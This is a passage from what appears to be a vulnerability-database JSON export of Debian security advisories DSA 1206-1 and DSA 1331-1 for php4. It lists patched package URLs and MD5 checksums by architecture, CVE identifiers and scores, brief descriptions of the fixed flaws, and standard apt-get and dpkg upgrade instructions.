http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 13056 9c12b7d4dc873e79ee0367b2f127974a\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 21592 347945c9d9724838b43d11d8f1d4d5d6\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16164 9f74e955acaf979f87665c3376c0cfba\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1661074 de33a92ea64c2550885a34babf3f5ae5\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1659118 207692feed208166db82a46f076e938d\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 3280842 aaba5c02175be6b9aac9a0ff8d3a97aa\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1646628 05931feddf04a8b49a0d6949a85ec9eb\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 167922 9186efbcb949031a5fccc92ba312ee38\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 19648 6da340b1fa5354815eaba491289986f5\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 325250 15eea0af4ce60a1dcfe1d7ae92afc402\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 38644 b4040bf7ecfe5b637313f9bc5e882888\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 34522 2e6be18ffa1aa076263a6da66a88c27e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 37694 507520edf8e62d12190a3784d9c5a0aa\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 21412 5cc50111e0d54a54a8ec1f2b7d0dbe30\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 19728 ba9ce16e48257a48a46a33cf341e54cb\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 9580 00eb12058d551beb520cecc1f34e8c59\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 22604 38e4691efa7d14d4bc03837f476df8f3\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 28678 8c9c39f6f82f3392b80e14cf275aef87\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 9288 de1312a2c4216b38eb6c1a22f5efe546\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 14962 707066edaffa958be582a9212f2a21cc\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 23042 4de2aa3b1d417f9d26e2e5bf1dd71788\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 18272 a0efbed8f0c4b8a776c25e63f3342a8a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_s390.deb\n Size/MD5 checksum: 1709170 9617e3bbeb9446df5c1900e28cfc52b1\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_s390.deb\n Size/MD5 checksum: 1708204 22f34f5b7a54d8f3451b7fe102957734\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_s390.deb\n Size/MD5 checksum: 3359814 b023379d97ef567f2683ac4b5f890971\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_s390.deb\n Size/MD5 checksum: 1686996 505abcc5893d0a3baeafd6e2b0b0eb31\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_s390.deb\n Size/MD5 checksum: 167916 e5523c78fa26ed7407fd67100e5a83ce\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_s390.deb\n Size/MD5 checksum: 17842 eb4b8cff51d8fa622a12d44d6bd5b565\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_s390.deb\n Size/MD5 checksum: 325198 fa39ecd9bb6fd108ace01971d5d760d8\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_s390.deb\n Size/MD5 checksum: 41124 e325433c9917a0f9ed78487b809486b8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_s390.deb\n Size/MD5 checksum: 33562 19bba35e8efcb6b6eed5902c4b65f64d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_s390.deb\n Size/MD5 checksum: 37390 f044f6504195d0e26c70e794a7ff1c19\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_s390.deb\n Size/MD5 checksum: 21422 41504297d336bbb1980a48a5ac31a8be\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_s390.deb\n Size/MD5 checksum: 17730 9a7635d7747ec80f38678b96c1104f25\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_s390.deb\n Size/MD5 checksum: 8404 8f214c43723e76ec8b0844787f7e4c98\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_s390.deb\n Size/MD5 checksum: 22932 42e45785723a8ab3271c8314c36ef810\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_s390.deb\n Size/MD5 checksum: 28870 958a0c1ad3980cc26ba6189cdf0cc021\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_s390.deb\n Size/MD5 checksum: 8046 e809d6ba139fc24b01b9555b201a3fc8\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_s390.deb\n Size/MD5 checksum: 13896 dc37c6e85e1b356ba613b38925748228\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_s390.deb\n Size/MD5 checksum: 22268 91fbdc05c3fcf7dfadeb43b3efc9994a\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_s390.deb\n Size/MD5 checksum: 17302 bd9c0b622afb237e5de2c554fffa5b9c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1623888 ee4aedd6b606aba754a303a541c77919\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1620786 24dc831a486a402d8f136a0a5a5faecf\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_sparc.deb\n Size/MD5 checksum: 3197026 c8bc2f63cd0efd85baa0375b6efe86b0\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1605892 78a3c37f4af1c88784c01fd851da2210\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_sparc.deb\n Size/MD5 checksum: 167940 16e45134f678a7511f3ef6b0e5ec86b9\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_sparc.deb\n Size/MD5 checksum: 18082 e11be70c03c1c1c2abe1c3c3f7cfb83d\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_sparc.deb\n Size/MD5 checksum: 325308 440df8a0434ac65f4aa1199e33015da1\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_sparc.deb\n Size/MD5 checksum: 36492 3f654fa0a80786edb8302fb23ad0c965\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_sparc.deb\n Size/MD5 checksum: 31942 cd693e51e4e75e60c7d6d827988bf721\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_sparc.deb\n Size/MD5 checksum: 36192 12252492284b653d5286098d1d2056a2\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_sparc.deb\n Size/MD5 checksum: 19286 8fb4f461f23b0e388939498c75a06055\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_sparc.deb\n Size/MD5 checksum: 17494 31449be7b22340e753e49e21106d8231\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_sparc.deb\n Size/MD5 checksum: 7874 9166cab619fd43713eec88016096bd1c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_sparc.deb\n Size/MD5 checksum: 20672 a9b3e7d4ed1a95b16b401c7a8c0db990\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_sparc.deb\n Size/MD5 checksum: 26542 87c822f25db53c283f5ff8fb0dc6f261\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_sparc.deb\n Size/MD5 checksum: 7598 05e5f7e761f14797c0f7babd747f14c7\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_sparc.deb\n Size/MD5 checksum: 12840 59e5bf49084a5eff48987b8b884e51e3\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_sparc.deb\n Size/MD5 checksum: 20848 8eb304df470d8144050b1797d8b67b9d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_sparc.deb\n Size/MD5 checksum: 15866 ac6ef12e44e28426818b29e94f177f48\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2006-11-06T00:00:00", "title": "[SECURITY] [DSA 1206-1] New php4 packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:12:56", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2006-3017", "CVE-2006-4482", "CVE-2006-5465"], "modified": "2006-11-06T00:00:00", "id": "DEBIAN:DSA-1206-1:A74A0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00302.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:46", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-ldap_6:4.4.4-8+etch4_all.deb", "packageName": "php4-ldap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-dev_6:4.4.4-8+etch4_all.deb", "packageName": "php4-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-pgsql_6:4.4.4-8+etch4_all.deb", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-recode_6:4.4.4-8+etch4_all.deb", "packageName": "php4-recode", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-gd_6:4.4.4-8+etch4_all.deb", "packageName": "php4-gd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-xslt_6:4.4.4-8+etch4_all.deb", "packageName": "php4-xslt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-gd_4:4.3.10-22_all.deb", "packageName": "php4-gd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-odbc_4:4.3.10-22_all.deb", "packageName": "php4-odbc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-xslt_4:4.3.10-22_all.deb", "packageName": "php4-xslt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4_6:4.4.4-8+etch4_all.deb", "packageName": "php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-imap_6:4.4.4-8+etch4_all.deb", "packageName": "php4-imap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-snmp_6:4.4.4-8+etch4_all.deb", "packageName": "php4-snmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-sybase_4:4.3.10-22_all.deb", "packageName": "php4-sybase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-imap_4:4.3.10-22_all.deb", "packageName": "php4-imap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-domxml_6:4.4.4-8+etch4_all.deb", "packageName": "php4-domxml", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-sybase_6:4.4.4-8+etch4_all.deb", "packageName": "php4-sybase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "libapache2-mod-php4_4:4.3.10-22_all.deb", "packageName": "libapache2-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-mcrypt_6:4.4.4-8+etch4_all.deb", "packageName": "php4-mcrypt", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-common_4:4.3.10-22_all.deb", "packageName": "php4-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-curl_6:4.4.4-8+etch4_all.deb", "packageName": "php4-curl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-ldap_4:4.3.10-22_all.deb", "packageName": "php4-ldap", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-cgi_4:4.3.10-22_all.deb", "packageName": "php4-cgi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-dev_4:4.3.10-22_all.deb", "packageName": "php4-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-mysql_6:4.4.4-8+etch4_all.deb", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "libapache-mod-php4_4:4.3.10-22_all.deb", "packageName": "libapache-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-interbase_6:4.4.4-8+etch4_all.deb", "packageName": "php4-interbase", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-mhash_4:4.3.10-22_all.deb", "packageName": "php4-mhash", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-mhash_6:4.4.4-8+etch4_all.deb", "packageName": "php4-mhash", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-recode_4:4.3.10-22_all.deb", "packageName": "php4-recode", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-domxml_4:4.3.10-22_all.deb", "packageName": "php4-domxml", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-pear_6:4.4.4-8+etch4_all.deb", "packageName": "php4-pear", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-cli_4:4.3.10-22_all.deb", "packageName": "php4-cli", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "libapache-mod-php4_6:4.4.4-8+etch4_all.deb", "packageName": "libapache-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-cli_6:4.4.4-8+etch4_all.deb", "packageName": "php4-cli", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4_4:4.3.10-22_all.deb", "packageName": "php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-mcal_4:4.3.10-22_all.deb", "packageName": "php4-mcal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-mysql_4:4.3.10-22_all.deb", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-snmp_4:4.3.10-22_all.deb", "packageName": "php4-snmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-common_6:4.4.4-8+etch4_all.deb", "packageName": "php4-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-odbc_6:4.4.4-8+etch4_all.deb", "packageName": "php4-odbc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-cgi_6:4.4.4-8+etch4_all.deb", "packageName": "php4-cgi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-pear_4:4.3.10-22_all.deb", "packageName": "php4-pear", "operator": "lt"}, {"OS": "Debian", "OSVersion": "3.1", "packageVersion": "4:4.3.10-22", "arch": "all", "packageFilename": "php4-curl_4:4.3.10-22_all.deb", "packageName": "php4-curl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-mcal_6:4.4.4-8+etch4_all.deb", "packageName": "php4-mcal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "libapache2-mod-php4_6:4.4.4-8+etch4_all.deb", "packageName": "libapache2-mod-php4", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "6:4.4.4-8+etch4", "arch": "all", "packageFilename": "php4-pspell_6:4.4.4-8+etch4_all.deb", "packageName": "php4-pspell", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1331-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 7th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-4486 CVE-2006-0207 CVE-2007-1864 \n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2006-0207\n Stefan Esser discovered HTTP response splitting vulnerabilities\n in the session extension. This only affects Debian 3.1 (Sarge).\n\nCVE-2006-4486\n Stefan Esser discovered that an integer overflow in memory allocation\n routines allows the bypass of memory limit restrictions. This only\n affects Debian 3.1 (Sarge) on 64 bit architectures.\n\nCVE-2007-1864\n It was discovered that a buffer overflow in the xmlrpc extension\n allows the execution of arbitrary code.\n \nFor the oldstable distribution (sarge) these problems have been fixed\nin version 4.3.10-22.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 4.4.4-8+etch4.\n\nThe unstable distribution (sid) no longer contains php4.\n\nWe recommend that you upgrade your PHP packages. Sarge packages for\nhppa, mips and powerpc are not yet available, due to problems on the\nbuild hosts. They will be provided later.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-22.dsc\n Size/MD5 checksum: 1686 275d3bf152c7eb24f9054726f259dd19\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-22.diff.gz\n Size/MD5 checksum: 288318 8b08b97d85d96ce4a6f0ba89ef8ed143\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz\n Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-22_all.deb\n Size/MD5 checksum: 249994 9542829963ecc9a84d0c5ae8e6d5543c\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-22_all.deb\n Size/MD5 checksum: 1146 8de38b3066c2a9e5e18cb5a4efff4856\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_alpha.deb\n Size/MD5 checksum: 1702008 e32f6acc34ed622dcf7ec1982eb9b900\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_alpha.deb\n Size/MD5 checksum: 1699516 4bdf08bba93781f2d5db18610ff1dc8f\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_alpha.deb\n Size/MD5 checksum: 3467224 35abf7fbe0b4a1c266ee840e1011cc67\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_alpha.deb\n Size/MD5 checksum: 1743864 d80afc3e61de65fa1dcc48484307a138\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_alpha.deb\n Size/MD5 checksum: 168716 057d3633627eb97d0441152936554f44\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_alpha.deb\n Size/MD5 checksum: 18134 16280cd4b134549f089ec08e38a1d685\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_alpha.deb\n Size/MD5 checksum: 328140 dbdd1143e30e362cc6e50b7fe16d0d58\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_alpha.deb\n Size/MD5 checksum: 39026 be4086a4dff7aac9f4171072160aa9bf\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_alpha.deb\n Size/MD5 checksum: 34542 50517a6e45bb7989c38d5fbcad8eae92\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_alpha.deb\n Size/MD5 checksum: 38136 acdc4849f6a5da157b26fcdb40338ec3\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_alpha.deb\n Size/MD5 checksum: 21362 15545c182b051a29eea026ed26f1e9ff\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_alpha.deb\n Size/MD5 checksum: 18194 2ef3306dbe374c3ba0712baf504becba\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_alpha.deb\n Size/MD5 checksum: 8320 cb10233cec53033abe1228c2108d95a6\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_alpha.deb\n Size/MD5 checksum: 22438 b59951d5e7a418155597d744a6a779e0\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_alpha.deb\n Size/MD5 checksum: 28360 9ebbaaf32b5c114438169cffb0d4ac8b\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_alpha.deb\n Size/MD5 checksum: 7952 ab3d11217a23213456c8bd5e9fc32c29\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_alpha.deb\n Size/MD5 checksum: 13756 cc75c2e6185f4263d6ede795f4ea82d8\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_alpha.deb\n Size/MD5 checksum: 23288 50227bb43b38eae775d2f4d37051ce7d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_alpha.deb\n Size/MD5 checksum: 17876 eb54ca23af0746eb8ac4bc7bf4168bde\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_amd64.deb\n Size/MD5 checksum: 1661084 0b6824047bc867b95d207bc9a4a29f03\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_amd64.deb\n Size/MD5 checksum: 1658342 3a26fa9b301bb633dc3fda9091d86a36\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-22_amd64.deb\n Size/MD5 checksum: 3279950 951afe757262f9e7a15a1593b1cda079\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-22_amd64.deb\n Size/MD5 checksum: 1649058 96d9a0250ca02e74ee7c5e4b0fcde48f\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-22_amd64.deb\n Size/MD5 checksum: 168870 ec162fe6f1ac95d1a279af2a679bcb90\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-22_amd64.deb\n Size/MD5 checksum: 17830 81c2d6c54071e5d96d9c04aaee13b236\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-22_amd64.deb\n Size/MD5 checksum: 325178 d3eb922af0afaee903d3be11a4d7af2a\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-22_amd64.deb\n Size/MD5 checksum: 40802 d716cc1f761739234112d8071dff948e\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-22_amd64.deb\n Size/MD5 checksum: 34280 4102ad6bb2d0bf31123aa04da4f887d9\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-22_amd64.deb\n Size/MD5 checksum: 37722 4d0debcc05934a146b49541532062c45\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-22_amd64.deb\n Size/MD5 checksum: 21410 d4ba2d15a150693ea84683e687b8700c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-22_amd64.deb\n Size/MD5 checksum: 18886 f32a1fe0c5de6aaed25d5fd93a952666\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-22_amd64.deb\n Size/MD5 checksum: 8240 d582f01decbc6341dffa413ca0f83b92\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-22_amd64.deb\n Size/MD5 checksum: 22884 91df08831320ffe5ccae67e4b1acfbe1\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-22_amd64.deb\n Size/MD5 checksum: 28780 e24ee4263ffbd4beccca7fbfd6ffbd26\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-22_amd64.deb\n Size/MD5 checksum: 7908 c46c1033560635c06cd1550ddee4d8ab\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-22_amd64.deb\n Size/MD5 checksum: 13668 4194188b82f0536041be6c62ca80f03e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-22_amd64.deb\n Size/MD5 checksum: 22434 7c95d870c77874e8cdd9333ecb4d6c12\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-22_amd64.deb\n Size/MD5 checksum: 17572 b755733b324f8b6fe009ce58be81b871\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-22_arm.deb\n Size/MD5 checksum: 1593104 5410609c3c65c8bf11a48e7aa387ac80\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-22_arm.deb\n Size/MD5 checksum: 